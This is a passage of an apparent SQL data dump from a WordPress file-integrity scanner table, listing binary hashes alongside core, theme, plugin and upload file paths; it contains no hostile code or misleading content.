�b����d�]F�i�POZq��','',0,'?'),('���\\��.1��-��:','wp-admin/options-media.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','L3�ӫ���{�G�p@','�������31��0Z����YX�~7�z','',0,'?'),('��ΝH�*��*.ځS','wp-admin/includes/bookmark.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','F`W�3�U���H�','ߘ��c.5%i��IA��4��Zz5�I����}','',0,'?'),('��r(��\\����%��','wp-content/languages/themes/twentynineteen-en_GB.mo',0,'9�9�) &�k�ߪ�d��','9�9�) &�k�ߪ�d��','Ik��G��]@�h�CI}m�j{#��qJ@�i�','',0,'?'),('��]y����}���8�','wp-content/plugins/wordpress-seo/images/news_plugin_assistant.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>��1J/��G�}@�','/���_Ju��u�9ךI� ��[?a���0�Y�','',0,'?'),('��dx���eB�ݙϟ5','wp-includes/IXR/class-IXR-clientmulticall.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�H���q�g��l�t','��ғ\'bO����E�&ƧW0h� o�\\`��Y��','',0,'?'),('�ɔ/� yT�5:Dh�','wp-content/plugins/wp-cerber/assets/flags/mn.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�!�{�)YJ����','/ҹ��;9��������\0d�֑�]�>','',0,'?'),('��Ul1�ȕD�bmg�','wp-includes/css/buttons-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','F��X�WDw����ڭ�','�o� ������!Pc�����\0�i�F9aK����','',0,'?'),('���Ϗ��RCOh����','wp-content/plugins/wordfence/vendor/maxmind-db/reader/src/MaxMind/Db/Reader/InvalidDatabaseException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0��6��.tz��x�o','��;���p^\0��3�Թ�(� ��A���a���w','',0,'?'),('�\nfv�8���1���-I','wp-includes/SimplePie/Exception.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','逗z�qŔ��/��','_pe�NO�/�*�mv��ȿ�n6*��zo��n�','',0,'?'),('���U�N,� \\1','wp-content/themes/twentynineteen/sass/forms/_forms.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%��n����ŋA�','h��VC{�B�{���4O�b�]=��;X)��(X�','',0,'?'),('�F�[��㵋Pѳ�@�','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Record/Postal.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','M�b�P\"��x�Y@0��','�\'���n��*2nԋ����)�a(�_�Iq�ɘ{','',0,'?'),('�O�\0�Q,�N 4$�N��','wp-content/plugins/redirection/redirection-settings.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','iW(�f1�I��\'퐢A�','�\\�缒v%�eĂ*<DM5E�&%��y����','',0,'?'),('�`�`\'�l`=��X(','wp-content/plugins/wordfence/views/options/option-select.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','J*E�%v N�a!��Uw','M��#3�a@xh���s\r5qB�N٣�X#��','',0,'?'),('�y��ё�c�j!�\\\'','wp-includes/class-wp-block-list.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�.�״�8��9��','�$-���R̒�~�����N�j��]?=��&','',0,'?'),('�2�D[\"��*\"(��','wp-includes/js/jquery/ui/effect-size.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','a;l�@��r%�ݢZ','���cQ>�WYe\Zw\"���`�M�rј^','',0,'?'),('��hJ��D�㰗G� �n','wp-content/plugins/wordfence/lib/wfCentralAPI.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','耳��B/�X�\n`�2r','��>C��]�!��կVMՍ�4U��U����\Z','',0,'?'),('���\"�\Z%K�e�*���','wp-content/themes/vega/assets/img/ico_arrow_ud_black.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';�v[�۠\'�䦳D','&c\0c6���^Y�/�M�%�|c@w�v��\\','',0,'?'),('��\\���0O�\'w[l/^$','wp-includes/blocks/gallery/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','.����7��g�YL�uz','���N�\ZUyn�;;�E(?�bfs�Iofر1�2','',0,'?'),('���ZQ4��\\(�܇','wp-admin/network/admin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ϯ\r��&Z3�r�\"�','�:��%�;Ki�W@>�U;������#�>','',0,'?'),('�ɶ��z^��ͅ�B�','wp-content/plugins/wordpress-seo/vendor_prefixed/guzzlehttp/psr7/src/MessageTrait.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Z\Z�k4���}��t�','���2��!���\n�:����3_qH���Z','',0,'?'),('��[0��^������','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Model/AnonymousIp.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','e�mg�ݜ|�<뼸Dh','�+��%�G�<t�1]�I�5m�\Z�}��E�>�;','',0,'?'),('��Ƞ\">�gݠ���','wp-content/themes/twentytwentyone/assets/css/custom-color-overrides.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�`f��5�[���֛��','�T�wUZ���c�F�`�Y[�a���Z','',0,'?'),('��/�؊!�N>�\n�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Ed25519.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��f<_2S^I��Z','��iݯ��8{��i���q!d���Ս��Az�','',0,'?'),('��\r���x��7TL�','wp-content/themes/twentytwentyone/assets/css/style-editor.css.map',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(ũZ�lgۙ��-��','��.����e2[�_��|0�y�0Q��@}�','',0,'?'),('�\'}j��=A>\r���9','wp-content/plugins/wp-cerber/assets/flags/vi.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','j�.f���&� S��j','����)Am{���M�D�&��ʑaG\rmM�f','',0,'?'),('�Km�M�����oч�','wp-content/plugins/wordpress-seo/src/integrations/front-end-integration.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�{v�+��p�D_���','�N�$y�%t7U����ش!���E�ctN_�B','',0,'?'),('�!�VTg�\"O\r�.�2L','wp-content/plugins/wp-cerber/assets/flags/pn.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����E~&X��l�x','g���\'G��5�ɒ<�tȺyol���|U�ӫ','',0,'?'),('�\Z���l���3Ȋ�','wp-includes/js/tinymce/skins/lightgray/fonts/tinymce.woff',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','P�UՒ�JL��m8`v','ӛ�vQ��k��\n��l�]�`Ε��۷�+}�kO�','',0,'?'),('�<h�iѭ3*� Fq','wp-includes/blocks/button/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�!��q����\0e��]j','q��kdˤ�p���^�ℙ��|:˷\0�;YujF','',0,'?'),('�J|6}�P�,\rٛ','wp-admin/css/colors/_admin.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','p\n��@!�#�D[�`�f','0���GO�����}����Tۙ��^v1��t','',0,'?'),('�O�~�ZA8�6��}��','wp-content/plugins/wordpress-seo/vendor_prefixed/league/oauth2-client/src/OptionProvider/OptionProviderInterface.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�[�@h+6��5�J�N�','hVFJ���ls+�\0<������F�.���/�*w�L','',0,'?'),('�Z�@����E�ya�B','wp-content/themes/twentynineteen/sass/typography/_headings.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�|R��s�x���*%�','�pЎ��(�W�\\��� �c�36�\0��\'�f�','',0,'?'),('�\\O�hq��2���.�','wp-content/plugins/wp-cerber/assets/admin.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','J��`���.��/','���>6Q�n��7���2�Sۈ܊�� �','',0,'?'),('�d`#)?�ϳ��0(w��','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Crypto.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' �oY���-�)EHd','l�,8�E�T��C�eyl�a�S��;)\'\"d�`z��','',0,'?'),('��x�`�f,5ef2��','wp-admin/js/site-health.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Θ�>I�Vp�F�G�N}','iD@�V>k��(�t# �`�9���H*\'��c���','',0,'?'),('�����[��:�����q','wp-admin/includes/class-wp-plugins-list-table.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','e��ʽ�z\r�Q<�N�G','��?`:3bO���Y�.��*��/��u��Pb_�','',0,'?'),('�������\0+��A�.\\','wp-content/plugins/wp-cerber/assets/flags/qa.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��z���%4o�m)�|$I','F��{tT��$(��lVq�5��O�*g','',0,'?'),('���P�Of;���/��','wp-includes/SimplePie/Decode/HTML/Entities.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��jыp&y������U','��WP��*P=Nϻ;\Z���i��8��2�_��� ','',0,'?'),('��.yz�_��jz�|�','wp-content/themes/twentynineteen/images/pattern_03.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�e�Y)f�x��:.+��','4]ou�\'�u�����mN��ZV;Ke��jW>T','',0,'?'),('����|ˌ���jϢ�\\','wp-content/themes/vega/assets/css/bootstrap.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ĖcT�UgM�tN�^�','���Ri���\"0���6{8K�ظ�\Zo��','',0,'?'),('������dN����h�,','wp-content/plugins/redirection/models/monitor.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7�K}�� �(.6`P�','t����a�?j�u�k. p��< ރ�)','',0,'?'),('��Z��(���|��Z','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Compat.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','QU�p~ocÊ4�Nt��','�L��n�l2@ΐ�>h�i,uJY�H��\\�L�,�B','',0,'?'),('�┬�E��+,����','wp-content/plugins/wp-cerber/jetflow.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�U���5����� ��g','�\'e^Ƈ/�G�Ow��=|��_(ӋgW���A','',0,'?'),('��\\ ��Iѻ���,','wp-includes/class-simplepie.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(��\\��Jġ�љ�','�8l�n-� �o�=��8,;h�\'LFR#�ʜB','',0,'?'),('�鰸y������\"�q�','wp-content/plugins/wordfence/js/jquery.colorbox-min.1629122067.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Y5�=��q��)����','H��4\\��v��/X�G��K����:gkl','',0,'?'),('��ڙy�2D\na��93','wp-includes/block-supports/layout.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ABɳ@jƑ!B6��','s7M��?�roqA���I��P��I��`i�','',0,'?'),('���\\�]^�T�ꥊ�','wp-includes/js/dist/vendor/wp-polyfill-url.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','rt\0X��d�xR`��','��b�ՔW�?��gtRċ\\}�D�E�TӇ��=','',0,'?'),('�$=Z��Z�Hɼ���f','wp-content/themes/twentytwentyone/assets/sass/06-components/navigation.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','������;Y�lE�','�_��E>���@��[)�$�=�A�L� C�Mp�','',0,'?'),('�$lv��EC۩bN','wp-content/themes/twentytwenty/template-parts/footer-menus-widgets.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','WC��B����I�mU','���z�jy�I���`F�����.\rCC!qc_','',0,'?'),('�/&����2�ѡ\rgDs','wp-includes/http.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�-��X㑩��/��2','? *�~HxJF�z����h�mp�ǖ}����','',0,'?'),('�5قaܨϘ� #��bu','wp-includes/js/dist/compose.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�t6��9�*���J==�','-esT1z�� �WOC���S�a�Q�F��p0','',0,'?'),('�>ڤXg\rs�u#�X','wp-content/plugins/wordpress-seo/admin/views/class-yoast-integration-toggles.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ڻ�;B�Z�gj�F\"�','`�?��{G�TW��%�,sf\Z���61w:e','',0,'?'),('�?q�Hl��(�2�m','wp-content/plugins/wp-cerber/assets/flags/pg.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���;[����*��','��9O#���x�_���v ��~�%W\Z���','',0,'?'),('�b�E��3�g\'cZ (��','wp-content/plugins/akismet/views/get.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ӵ��q��\'7��\0�Y>�','���x����[�%�����@��c����','',0,'?'),('�dSp@���\\��0)�q','wp-content/plugins/wordpress-seo/src/routes/route-interface.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�N�䶈Hu,����','M��\0un~��׃�X�T��T���,K8U��','',0,'?'),('�����r��~��\Z','wp-content/plugins/wp-cerber/assets/flags/ws.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2���Mr�Z�Yܑz�r','$�!�9��d9��8E�\".0�����J��K`','',0,'?'),('����=��Ѷ�8$�','wp-includes/js/dist/vendor/wp-polyfill-node-contains.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/2�;����(��U���','i-���;R�9��s� �bl��:XJ$�K� �','',0,'?'),('��?�0|��5uơ��','wp-admin/custom-background.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','㽫��]0�m7��d','Z�5\"=�\0�T�σqr�/0��Q�X^dn6','',0,'?'),('��<eJ���5}��j','wp-includes/blocks/site-logo/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','N�J.�����~��','R�\\.��N���~�i71��Q��\rt�4�I9','',0,'?'),('���qh�n�J�j�','wp-admin/css/nav-menus.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=1WФ���c �2{L','�qA��KD��:\n�\\v�>�o�T^�`���','',0,'?'),('���<� �f%�n�O�','wp-admin/includes/credits.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Ĝ-+\Z�\ry{-�{\nJ','���������RŇ��m�xqA�.���8e�3 ','',0,'?'),('����GS�Du︲�','wp-content/uploads/2016/11/wood-fibre-boards-2928524_960_720-300x200.jpg',0,'�S�gأ_���Z�5','�S�gأ_���Z�5','�pܳ�z��2��n|�b�G��A\\��O��x','',0,'?'),('�ÏuL�,�&Ǒ�\r1','wp-admin/media.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�;�6���U��3','�D�K���3�́uB!@oP��b��#���~','',0,'?'),('�Ӏ9[�M-g��','wp-includes/js/dist/hooks.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Dނ@��)1 ��.�1k','�Ӗ��w�\n���c^?q�7}Xb*��\'�*$�','',0,'?'),('��%I���}�P�zW��','wp-includes/random_compat/random_bytes_mcrypt.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��T�Ԧʙ`�P��L','�b=�-.���X�����T���Yn���P��','',0,'?'),('��}�,\'\\��k)�~','wp-content/uploads/2019/12/pexels-photo-2098443-1024x683.jpeg',0,'��f���8�瞒�','��f���8�瞒�','�\r��/���/��KC�G��ۤa���u�P','',0,'?'),('��{Z��V���$��','wp-includes/blocks/social-links/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','f�ifM�X5p�E3','�-��q=����UV�>��D�ƹ�E�|HC[�','',0,'?'),('��+M�%��]�sD00�','wp-includes/blocks/freeform/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ϯ\r�Mdz�c�|L','�xr� �ߔ��څ^�ƨ�|�& ���ߊ5ӹ�','',0,'?'),('����G2V�D�m�L>','wp-content/plugins/wordpress-seo/vendor_prefixed/league/oauth2-client/src/Token/AccessTokenInterface.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���U��31��\Z�xV�','��ȵ���G�EKL��6���D�@]0Z��','',0,'?'),('�\n�Y�?�!��wH�L�','wp-content/plugins/wordfence/css/phpinfo.1629122067.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>��Q���!�0w/�蓴','���a�@|��I\r=\Z^ε�d)�[�����W��','',0,'?'),('�\n��n�=�^�n�N','wp-content/themes/twentytwenty/classes/class-twentytwenty-separator-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�kd�E�~��c����','(_{�ޫؠb��r,�c�l�^a�j��Z���','',0,'?'),('� )�!h$R�Uvx�ƺ�','wp-content/plugins/wordpress-seo/src/integrations/primary-category.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ӳ� H��� ̝��Us�','}ޚ:�M�)c��ϝ%�NBV���!u��l{','',0,'?'),('�(dwI\0:\r��Xx1DC','wp-content/plugins/wordfence/views/scanner/issue-control-hide-file.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�v��[���A.F3D�','@��ړ�V�C�+��<!;@8���9�(�n=�G','',0,'?'),('�,3.0m�ʖ��K,T','wp-content/plugins/redirection/locale/redirection-es_ES.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�w{u�w�7���','j��8�����b�9�$m�@ s&U�\Z��Y','',0,'?'),('�3�,���cv�k���','wp-content/plugins/wordfence/views/onboarding/overlay.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','М���������s�','��a:�F���V�W�5W�<n�o`��','',0,'?'),('�7ʏ��aB�Kz','wp-includes/blocks/button/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(��E�\Z�:����','{�p�C�٥F��7]h\Z~s42C���FC\r��<:','',0,'?'),('�WM��{h���(��','wp-content/plugins/wordfence/lib/menu_options.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','S�����e�ډT�a��','\nS��x�B�[��)ɩL�6ۖ>���Hϫܥ��','',0,'?'),('�]K{�ٯ��`�{�,','wp-content/plugins/wordfence/fonts/roboto-KFOlCnqEu92Fr1MmWUlfChc-AMP6lbBP.woff',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+E�YH��<YPK=�S','ۋ�&�:^���G���&B���2�PC��~���','',0,'?'),('�]s�Q\0tP�A|�\'�','wp-content/plugins/wordpress-seo/languages/yoast-seo-js.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�y-��l�_�6��T','�G�x�쭂c��Ro4DZrt\0˞44�p�zC�','',0,'?'),('�a�@o��\'��kb��','wp-includes/js/jquery/jquery-migrate.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','y��k~�x�$K^-3�}','��P�y���D\\\\�cd�~��P���`7 �F/','',0,'?'),('�owN$Ci/��O���','wp-content/themes/vega/assets/img/ico_arrow_lr_white.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���.tr��8,�!�','��wQ�n��w����z9�Lhc�6C�+�','',0,'?'),('�w�hI¹>�@v�J1','wp-content/plugins/wordpress-seo/src/config/migrations/20190529075038_WpYoastDropIndexableMetaTableIfExists.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\ZmK+O�^��FF�','T��A�t��p9��(d@�5�T+�����k','',0,'?'),('�x;_�q��*`<','wp-includes/blocks/group/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=>���*��f��[���','ϩ���z��J&�O{|K�^�֤�0.�1t','',0,'?'),('�|�\0�9����DQI�','wp-content/themes/vega/parts/header-top.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"�W_�=K�lp��','k�yyFN���1��ɧ��y˘�ڄ|=','',0,'?'),('�|��t���\r����','wp-content/plugins/redirection/locale/redirection-sv_SE.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' h}[�� �k,O�,','� �h���ώ��L��?\Z���� �RIҬ{','',0,'?'),('��i/�pEt�\n�l�','wp-content/plugins/wordfence/lib/rest-api/wfRESTScanController.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��r���0mb74$','�{h��D��X�^�w���6D�fc�@Q��\r�f','',0,'?'),('����2��?!�u�܆\"','wp-content/plugins/wordfence/modules/login-security/views/options/option-switch.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��[(AɊ�����h�','����ͳߘ�Q6̨!*���X�x��MM�u@','',0,'?'),('����^[X��i� �','wp-admin/themes.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Z���N�+l�����1','�j��S<�%\\�C��cK2�\\0��\Z�_��R','',0,'?'),('��:�X��@\0{*�֯�','wp-admin/includes/class-language-pack-upgrader-skin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','w��H�� lO J\rN','�m���%�n\r��؛��qi���m���V&W','',0,'?'),('��,����c��RzW�9','wp-content/plugins/wordpress-seo/src/conditionals/jetpack-conditional.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','������\Z&s\n��','���խ��I�b[�GY��0̢X�v��k�M�','',0,'?'),('��4T�(�\\9\'��3�)','wp-admin/css/customize-widgets-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�˭�f|�o�^PD�k','X+�aX�\Z4�UL��v5[�Y3r�O{�����','',0,'?'),('���\0n:T�q}K �@','wp-includes/Requests/Exception/HTTP/408.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�5�W��p�]\'zAz�','�q���*�lmKңk�\"�M�Q?�p���a�4','',0,'?'),('��k{��&��x\n��','wp-includes/class-wp-error.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�l� &�0?&�c~��','G�bM[G&Jr�F�E����1�r�s�L,t�(�W','',0,'?'),('���R���@�xRp��','wp-content/plugins/wordpress-seo/languages/wordpress-seojs-zh_CN.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��4MIi��5���1�','�j����O��=��7�$�NM�A@��]�@b���#�','',0,'?'),('��$�o��1�T�2]l','wp-content/plugins/wordfence/lib/dashboard/widget_countries.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','� ��d*W�����1g�','�+q�~;f�E_�#�]I�V�\\�k?l���ÝϞ�','',0,'?'),('���A0f��f`� Kǁ}','wp-content/plugins/wordfence/lib/wfDirectoryIterator.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\n+Z/_��\Zxu��v','��u���;IV��a[�~㵭�TZ\\^�yJ��j','',0,'?'),('����VFN #{��','wp-content/plugins/wordpress-seo/inc/sitemaps/class-sitemaps.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','$?�����5��m�e1��','~35�쇫�����F��Cl��I�I�uU','',0,'?'),('�\0��%3[$x\0��.��(','wp-admin/images/marker.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3�*O2/�3I2���','~T�@\\��vUI<�pK����a`T�@c��ca�','',0,'?'),('���p�1J�IZH�x�','wp-content/plugins/wordfence/js/wfi18n.1629122067.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','i&XDE���p/N�','GU ��*��k�P,�:�?+}x�Hb�5���#�','',0,'?'),('���4�����=��','wp-content/plugins/wordfence/images/icons/ajaxScan.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ʖ�Ѵ��~f���i�','�ߩ0�ԍ���Ѧ�ƻH\n�����¡;�','',0,'?'),('� ���Em[�����l�<','wp-includes/js/tinymce/plugins/image/plugin.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-��ZC�l}�莐�','y��T��Nz+������\'��%Y�','',0,'?'),('�����L��\Z��','wp-includes/blocks/query-pagination/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',')��c�i�?\\��$3','5K��ߒAͼ~��;#x�(ĬE�-�-�}���','',0,'?'),('�6��i��Z(�qa','wp-content/plugins/wordpress-seo/src/presentations/indexable-presentation.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ַ���4��6��%e','�r��4p�u��_w�5��ips���ϛ��e','',0,'?'),('�D`B�ȥ�\n�b�Ǚ','wp-content/themes/twentynineteen/sass/_normalize.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����Ut _��vO0a','LL�Z�m��h2-s��,+�<�s!@tp�z�G','',0,'?'),('�MQ��HY�_r$K�S�','wp-content/themes/twentytwenty/assets/js/customize-preview.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���`����n�����','�ĥ��^m�+u#n^,\'�o�\\����8���{N','',0,'?'),('�_)BIR�Xo0ֵl��','wp-content/plugins/wordpress-seo/src/integrations/watchers/indexable-static-home-page-watcher.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��2}��f,N�z�\\�b','�E�-�h$$^��\Z?�G��\\�4�QxH\"�SQ','',0,'?'),('�o͑��4\\RX���r','wp-content/plugins/all-in-one-wp-security-and-firewall/logs/.htaccess',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��8����I�y{��8�','�O��t-�qu�b���O���%�\r?�3�80��','',0,'?'),('�z���e�.�}-�','wp-content/plugins/wordpress-seo/languages/yoast-components-zh_CN.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��5�e�Eu\"��\Z�C ','�$�o�r�J�f|0��$��H�~�L�8�E���','',0,'?'),('��� ���aɃXc���','wp-content/uploads/2016/11/roofs-768x432.jpg',0,'D��Z�:����M�','D��Z�:����M�','��W�.���\Z�M:Bq�v�`$�?%q�M�S\\r�','',0,'?'),('�����Q��f�U�\Z�IH','wp-content/themes/vega/parts/frontpage-cta-dark.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�o<�R�W��j�і','40��ϝ��4%6��_��|�M��Q�ˊ$��H','',0,'?'),('��ݽ����DA�\n�#.�','wp-content/uploads/2019/09/cleaning-3977589_960_720-768x511.jpg',0,'�[$ �Q�5�O @��','�[$ �Q�5�O @��','f��\'%1L��\\�}���+p�����Ը\'d�Iu�','',0,'?'),('��{�]\\ֵ� ��d��','wp-admin/css/forms-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','bG�2���4�j��j�7','�3�~�\'����$�����W�E��\\��Y�','',0,'?'),('��\n�fQ8Wm��=�R','wp-content/plugins/wordpress-seo/admin/class-bulk-title-editor-list-table.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','X)�/�Hp�XX恑#�','4���.��9�L�`��r.+.�\0f�㱘�','',0,'?'),('����y/F]C�Û�I','wp-content/plugins/wordpress-seo/css/dist/wpseo-dismissible-1690.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����\Z������R�','�au�(�H�Q��m���B\Z�\"�z�y��#','',0,'?'),('�����PhP�','wp-content/plugins/wordpress-seo/js/dist/select2/i18n/it.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�O��e��d2PM���','Tt\\݈%�EǦ&d]����(�D��{�N�','',0,'?'),('�s���`�]�=#;','wp-content/uploads/2019/10/plumbing2-150x150.jpg',0,'t���`:C���ʏ���','t���`:C���ʏ���','8K0��n�*����6�L�8�S�\'PݪH�ŵ','',0,'?'),('�������\"�R�Ŝ','wp-includes/images/crystal/text.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�� Ѳ��#�d�%�[�','n1��0��<;�\n��Ip��~�f���⠸��z','',0,'?'),('�%��+~���R1��҉','wp-content/plugins/all-in-one-wp-security-and-firewall/js/index.html',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ُ\0�� ��B~','��B�����șo�$\'�A�d��L���xR�U','',0,'?'),('�6�\r�������\n�]�','wp-content/plugins/wordpress-seo/images/Yoast_SEO_negative_icon.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3��x�z���\r�X','���*�Ħk-�G(a\Z����twތ��.����','',0,'?'),('�@���;S��N=','wp-content/uploads/2019/10/plumbing2-768x512.jpg',0,'U�.a��4�9<:�\n�e�','U�.a��4�9<:�\n�e�','�ʥ���A�O�)��Ao��Ʀ&','',0,'?'),('�H��8З��2��E�6','wp-content/plugins/wordpress-seo/src/integrations/admin/disable-concatenate-scripts-integration.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','x\0)�\\b����6 Y���','ؒ��R�R<��Ef�:&<A1{ ]|ꀆ0d','',0,'?'),('�N�υ:yJ��X���!','wp-content/languages/plugins/wordpress-seo-en_GB-fcdcf6723c816a2da3270234ba26e793.json',0,'��r/�]O�9�\Z���','��r/�]O�9�\Z���','7� �-�w* 